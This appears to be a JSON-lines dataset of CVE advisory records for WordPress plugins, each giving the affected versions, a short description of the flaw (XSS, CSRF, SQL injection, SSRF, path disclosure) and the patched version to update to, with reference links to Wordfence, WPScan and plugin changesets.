{"CVE_ID":"CVE-2023-5776","slug":"post-meta-data-manager","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the pmdm_wp_ajax_delete_meta, pmdm_wp_delete_user_meta, and pmdm_wp_delete_user_meta functions. This makes it possible for unauthenticated attackers to delete arbitrary user, term, and post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d49b8c44-4dad-4990-a8a8-116b424a7dfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d49b8c44-4dad-4990-a8a8-116b424a7dfa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/post-meta-data-manager\\\/tags\\\/1.2.1\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/post-meta-data-manager\\\/tags\\\/1.2.1\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2981559%40post-meta-data-manager&new=2981559%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2981559%40post-meta-data-manager&new=2981559%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2994271%40post-meta-data-manager&new=2994271%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2994271%40post-meta-data-manager&new=2994271%40post-meta-data-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0059","slug":"youzify","versionEndExcluding":"1.2.2","description":"The Youzify WordPress plugin before 1.2.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e26c485-9a5a-44a3-95b3-6c063a1c321c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e26c485-9a5a-44a3-95b3-6c063a1c321c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12516","slug":"coupon-lite","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Coupon Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Coupon Code' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215992%40coupon-lite&new=3215992%40coupon-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215992%40coupon-lite&new=3215992%40coupon-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c0459-1328-4fb1-b044-ae80298fa5ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c0459-1328-4fb1-b044-ae80298fa5ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4789","slug":"wpzoom-portfolio","versionEndExcluding":"1.2.2","description":"The WPZOOM Portfolio WordPress plugin before 1.2.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e816e9a-84e5-42d2-a7ff-e46be9072278\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e816e9a-84e5-42d2-a7ff-e46be9072278\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8476","slug":"easy-paypal-events-tickets","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Easy PayPal Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the wpeevent_plugin_buttons() function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602d337e-0778-4182-8e77-0eb3b37d5a7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602d337e-0778-4182-8e77-0eb3b37d5a7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-events-tickets\\\/tags\\\/1.2.1\\\/includes\\\/private_buttons.php#L273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155809\\\/easy-paypal-events-tickets\\\/trunk\\\/includes\\\/private_buttons.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155809\\\/easy-paypal-events-tickets\\\/trunk\\\/includes\\\/private_buttons.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6527","slug":"email-subscribe","versionImpact":"1.2.18","versionEndExcluding":"1.2.19","description":"The Email Subscription Popup plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the HTTP_REFERER header in all versions up to, and including, 1.2.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f84814e-f7b7-4228-b331-63027a0770af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f84814e-f7b7-4228-b331-63027a0770af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.19\\\/wp-email-subscription.php?rev=3005188#L2125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.19\\\/wp-email-subscription.php?rev=3005188#L2125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24413","slug":"wp-vertical-image-slider","versionEndExcluding":"1.2.17","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution WordPress vertical image slider plugin <=\u00a01.2.16 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-vertical-image-slider\\\/wordpress-wordpress-vertical-image-slider-plugin-plugin-1-2-16-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-vertical-image-slider\\\/wordpress-wordpress-vertical-image-slider-plugin-plugin-1-2-16-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6560","slug":"addonify-quick-view","versionImpact":"1.2.16","versionEndExcluding":"1.2.17","description":"The Addonify \u2013 Quick View For WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.16. This is due to the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38eaab5-157c-43fa-ad67-6f063274ba69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38eaab5-157c-43fa-ad67-6f063274ba69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addonify-quick-view\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addonify-quick-view\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121821%40addonify-quick-view&new=3121821%40addonify-quick-view&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121821%40addonify-quick-view&new=3121821%40addonify-quick-view&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4467","slug":"search-filter","versionEndExcluding":"1.2.16","description":"The Search & Filter WordPress plugin before 1.2.16 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54168861-c0b8-4de6-a9af-0ad5c20b4a45\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54168861-c0b8-4de6-a9af-0ad5c20b4a45\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6732","slug":"ultimate-maps-by-supsystic","versionImpact":"1.2.15","versionEndExcluding":"1.2.16","description":"The Ultimate Maps by Supsystic WordPress plugin before 1.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 1.2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf91707-f03b-4f25-bca9-9fac4945002a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf91707-f03b-4f25-bca9-9fac4945002a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1862","slug":"woocommerce-add-to-cart-custom-redirect","versionImpact":"1.2.13","versionEndExcluding":"1.2.14","description":"The WooCommerce Add to Cart Custom Redirect plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wcr_dismiss_admin_notice' function in all versions up to, and including, 1.2.13. This makes it possible for authenticated attackers, with contributor access and above, to update the values of arbitrary site options to 'dismissed'.","recommendation":"Update to version 1.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13\\\/woocommerce-custom-redirect.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13\\\/woocommerce-custom-redirect.php#L204\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13&old=3047408&new_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.14&new=3047408&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.13&old=3047408&new_path=\\\/woocommerce-add-to-cart-custom-redirect\\\/tags\\\/1.2.14&new=3047408&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11276","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.136","versionEndExcluding":"1.2.137","description":"The PDF Builder for WooCommerce. Create invoices,packing slips and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.2.136 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.137, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202588%40woo-pdf-invoice-builder&new=3202588%40woo-pdf-invoice-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202588%40woo-pdf-invoice-builder&new=3202588%40woo-pdf-invoice-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9214","slug":"additional-product-fields-for-woocommerce","versionImpact":"1.2.133","versionEndExcluding":"1.2.134","description":"The Extra Product Options Builder for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'RednaoSerializedFields' parameter during the creation of a signature file in all versions up to, and including, 1.2.133 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.134, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09890f42-b9ee-4812-8cf2-f638ba9fb20f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09890f42-b9ee-4812-8cf2-f638ba9fb20f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/core\\\/Managers\\\/FileManager\\\/FileManager.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/core\\\/Managers\\\/FileManager\\\/FileManager.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/additional-product-fields-for-woocommerce\\\/trunk\\\/ajax\\\/OrderDesignerAjax.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173169\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173169\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3958","slug":"wp-remote-users-sync","versionEndExcluding":"1.2.13","description":"The WP Remote Users Sync plugin for WordPress is vulnerable to Server Side Request Forgery via the 'notify_ping_remote' AJAX function in versions up to, and including, 1.2.12. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This was partially patched in version 1.2.12 and fully patched in version 1.2.13.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2953845\\\/wp-remote-users-sync#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2953845\\\/wp-remote-users-sync#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/api\\\/class-wprus-api-abstract.php#L674\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-remote-users-sync\\\/trunk\\\/inc\\\/api\\\/class-wprus-api-abstract.php#L674\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2946667\\\/wp-remote-users-sync#file127\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e78c759-4a54-4ee4-8eff-df91fe9dad46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e78c759-4a54-4ee4-8eff-df91fe9dad46?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10116","slug":"favicon-by-realfavicongenerator","versionEndExcluding":"1.2.13","description":"A vulnerability classified as problematic has been found in RealFaviconGenerator Favicon Plugin up to 1.2.12 on WordPress. This affects the function install_new_favicon of the file admin\/class-favicon-by-realfavicongenerator-admin.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.2.13 is able to address this issue. The identifier of the patch is 949a1ae7216216350458844f50a72f100b56d4e7. It is recommended to upgrade the affected component. The identifier VDB-230661 was assigned to this vulnerability.","recommendation":"Update to version 1.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230661\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230661\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/favicon-by-realfavicongenerator\\\/commit\\\/949a1ae7216216350458844f50a72f100b56d4e7\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/favicon-by-realfavicongenerator\\\/commit\\\/949a1ae7216216350458844f50a72f100b56d4e7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230661\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230661\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6477","slug":"userswp","versionImpact":"1.2.11","versionEndExcluding":"1.2.12","description":"The UsersWP WordPress plugin before 1.2.12 uses predictable filenames when an admin generates an export, which could allow unauthenticated attackers to download them and retrieve sensitive information such as IP, username, and email address.","recommendation":"Update to version 1.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/346c855a-4d42-4a87-aac9-e5bfc2242b16\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/346c855a-4d42-4a87-aac9-e5bfc2242b16\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10777","slug":"anywhere-elementor","versionImpact":"1.2.11","versionEndExcluding":"1.2.12","description":"The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198665%40anywhere-elementor&new=3198665%40anywhere-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198665%40anywhere-elementor&new=3198665%40anywhere-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2138634-c149-4fd1-a33d-351bbf633ea3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2138634-c149-4fd1-a33d-351bbf633ea3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7414","slug":"pdf-builder-for-wpforms","versionImpact":"1.2.116","versionEndExcluding":"1.2.117","description":"The PDF Builder for WPForms plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.116. This is due to the plugin allowing direct access to the composer-setup.php file which has display_errors on.  This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.117, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a82837-f8da-44bf-81f6-af0d9c9a6e4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a82837-f8da-44bf-81f6-af0d9c9a6e4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3132289%40pdf-builder-for-wpforms&new=3132289%40pdf-builder-for-wpforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3132289%40pdf-builder-for-wpforms&new=3132289%40pdf-builder-for-wpforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-builder-for-wpforms\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php?rev=3009060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-builder-for-wpforms\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php?rev=3009060\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6265","slug":"userswp","versionImpact":"1.2.10","versionEndExcluding":"1.2.11","description":"The UsersWP \u2013 Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018uwp_sort_by\u2019 parameter in all versions up to, and including, 1.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37fd0582-5baf-4ced-a798-dc0970e90a3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37fd0582-5baf-4ced-a798-dc0970e90a3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userswp\\\/tags\\\/1.2.10\\\/admin\\\/settings\\\/class-uwp-settings-user-sorting.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userswp\\\/tags\\\/1.2.10\\\/admin\\\/settings\\\/class-uwp-settings-user-sorting.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106884\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106884\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4039","slug":"woo-orders-tracking","versionImpact":"1.2.10","versionEndExcluding":"1.2.11","description":"The Orders Tracking for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.10. This is due to the plugin allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. A partial patch was released in 1.2.10, and a complete patch was released in 1.2.11.","recommendation":"Update to version 1.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/991ab188-869c-4875-80f3-940000a1717b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/991ab188-869c-4875-80f3-940000a1717b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-orders-tracking\\\/trunk\\\/includes\\\/frontend\\\/frontend.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-orders-tracking\\\/trunk\\\/includes\\\/frontend\\\/frontend.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083652%40woo-orders-tracking&new=3083652%40woo-orders-tracking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083652%40woo-orders-tracking&new=3083652%40woo-orders-tracking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1689","slug":"woo-tools","versionImpact":"1.2.9","versionEndExcluding":"1.2.10","description":"The WooCommerce Tools plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the woocommerce_tool_toggle_module() function in all versions up to, and including, 1.2.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to deactivate arbitrary plugin modules.","recommendation":"Update to version 1.2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3830c901-be36-4c4b-976b-d388b6af0c67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3830c901-be36-4c4b-976b-d388b6af0c67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-tools\\\/trunk\\\/admin\\\/admin-init.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-tools\\\/trunk\\\/admin\\\/admin-init.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098165%40woo-tools&new=3098165%40woo-tools&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098165%40woo-tools&new=3098165%40woo-tools&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
